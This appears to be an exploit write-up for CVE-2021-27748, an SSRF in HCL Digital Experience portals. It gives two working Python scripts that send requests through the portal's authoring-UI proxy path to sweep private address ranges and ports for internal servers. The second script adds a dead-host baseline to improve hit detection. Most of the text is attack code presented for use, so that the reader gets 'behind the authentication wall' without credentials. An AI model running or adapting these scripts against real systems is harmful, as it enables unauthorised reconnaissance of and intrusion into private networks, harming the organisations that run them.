Changing the exploit

CVE-2021-27748

CVE-2021-27748 is a server-side request forgery (SSRF) vulnerability in HCL Digital Experience (the former IBM WebSphere Portal product) versions 9.0 and 9.5. SSRF is usually discussed in terms of making the server reach out to external hosts, but this vulnerability is at least as dangerous as a window into the internal network for unauthorised users.

Traditionally, SSRF is thought of as a way to interact with or exploit external systems. CVE-2021-27748 shows the more valuable pivot: using the SSRF to enumerate and talk to systems on the internal network. That can reveal internal services, metadata about the infrastructure, and internal-only endpoints and APIs. The vulnerable path is the portal's own proxy, /wps/PA_WCM_Authoring_UI/proxy/http/<host>: the portal fetches http://<host> and relays the answer, so the status code it hands back tells us whether the target responded. The script below exploits the CVE as before, but iterates over a private /16 and probes the first host of each /24 to find internal web servers. That puts us on the internal network, behind the authentication wall, without ever authenticating.

import ipaddress
import requests

# Browser-like headers; the Referer points back at the portal's own proxy path.
headers = {
    "Sec-Ch-Ua": "", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"\"",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document",
    "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Sec-Gpc": "1",
    "Referer": "https://www.example.com/wps/PA_WCM_Authoring_UI/proxy/http/127.0.0.1",
}

# Walk the private /16 one /24 at a time and probe the first host of each
# subnet (192.168.0.1, 192.168.1.1, ...) through the portal's proxy endpoint.
base_network = ipaddress.ip_network('192.168.0.0/16', strict=False)

for subnet in base_network.subnets(new_prefix=24):
    ip = next(subnet.hosts())
    url = f"https://www.example.com:443/wps/PA_WCM_Authoring_UI/proxy/http/{ip}"
    try:
        # Without a timeout a single unreachable host can stall the whole sweep.
        response = requests.get(url, headers=headers, timeout=5)
        print(f"IP: {ip}, Status Code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Error reaching IP: {ip}. Error: {e}")
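A more careful version of the same sweep, added here as an example and not code from the original post. It assumes the proxy also accepts a host:port target (the post only shows bare addresses), takes a baseline against an address that cannot exist on the internal network (TEST-NET-1, 192.0.2.0/24) so that "unreachable" is measured rather than guessed, and uses only the standard library. The portal hostname, the 10.0.0.0/28 range and the canned responses in demo_fetch are constructed so the sweep runs offline.

```python
import ipaddress
import itertools
import time
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Iterable, Optional, Tuple

# Proxy endpoint from the post: <portal>/wps/PA_WCM_Authoring_UI/proxy/<scheme>/<host>[:port]/<path>
# The ":port" suffix is an assumption; the post only shows bare addresses.
PROXY_PATH = "/wps/PA_WCM_Authoring_UI/proxy"

# A fetcher returns (status, body_length) for a URL or raises OSError on transport failure.
Fetch = Callable[[str], Tuple[int, int]]


@dataclass
class Probe:
    target: str              # "host:port" as placed in the proxy URL
    status: Optional[int]    # status the portal returned, None on transport error
    length: int              # proxied body length, used for the differential comparison
    elapsed: float           # round-trip seconds; slow answers often mean a filtered port


def proxy_url(portal: str, target: str, scheme: str = "http", path: str = "/") -> str:
    """URL that makes the portal fetch <scheme>://<target><path> on our behalf."""
    return f"{portal.rstrip('/')}{PROXY_PATH}/{scheme}/{target}{path}"


def real_fetch(url: str, timeout: float = 5.0) -> Tuple[int, int]:
    """Live fetcher. The Referer points at the portal's proxy, as the post's script does."""
    portal = url.split(PROXY_PATH, 1)[0]
    req = urllib.request.Request(url, headers={
        "User-Agent": "Mozilla/5.0",
        "Referer": f"{portal}{PROXY_PATH}/http/127.0.0.1",
    })
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:      # 4xx/5xx still carries a status
        return err.code, len(err.read())


def probe(fetch: Fetch, portal: str, target: str) -> Probe:
    start = time.monotonic()
    try:
        status, length = fetch(proxy_url(portal, target))
    except OSError:                            # URLError, timeouts, refused connections
        status, length = None, 0
    return Probe(target, status, length, time.monotonic() - start)


def looks_alive(p: Probe, dead: Probe) -> bool:
    """Differential check: anything that does not look like the dead-host baseline answered."""
    if p.status is None:
        return False
    return p.status != dead.status or abs(p.length - dead.length) > 64


def scan(fetch: Fetch, portal: str, network: str, ports: Iterable[int] = (80, 8080),
         max_hosts: Optional[int] = None, dead_target: str = "192.0.2.1:80"):
    """Probe every host:port in `network` through the proxy; return the ones that answered.

    The baseline is taken against TEST-NET-1, which is never routed, so whatever the
    proxy returns for it is what 'unreachable' looks like on this deployment.
    """
    dead = probe(fetch, portal, dead_target)
    net = ipaddress.ip_network(network, strict=False)
    alive = []
    for host in itertools.islice(net.hosts(), max_hosts):
        for port in ports:
            p = probe(fetch, portal, f"{host}:{port}")
            if looks_alive(p, dead):
                alive.append((str(host), port, p.status))
    return alive


def demo_fetch(url: str) -> Tuple[int, int]:
    """Constructed stand-in for the portal so the sweep runs offline: two live internal
    hosts, one that drops the connection, everything else answered like a dead host."""
    if url.endswith("/http/10.0.0.5:80/"):
        return 200, 5120       # an internal web server
    if url.endswith("/http/10.0.0.7:8080/"):
        return 401, 300        # an app server demanding auth: still alive
    if "/http/10.0.0.9:" in url:
        raise OSError("constructed transport error")
    return 502, 1200           # what the proxy hands back for an unreachable target (constructed)


if __name__ == "__main__":
    # Swap demo_fetch for real_fetch to run against a portal.
    for host, port, status in scan(demo_fetch, "https://www.example.com", "10.0.0.0/28"):
        print(f"{host}:{port} answered with status {status}")
```

The baseline step is the part worth keeping even if the rest is rewritten: a proxy may answer a dead host with a 200 and an error page, or with a 502 whose body is bigger than the real target's, and the post's script would print either as if it were a hit. Comparing every probe against a known-dead address turns "what status did I get" into "did this look different from nothing".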
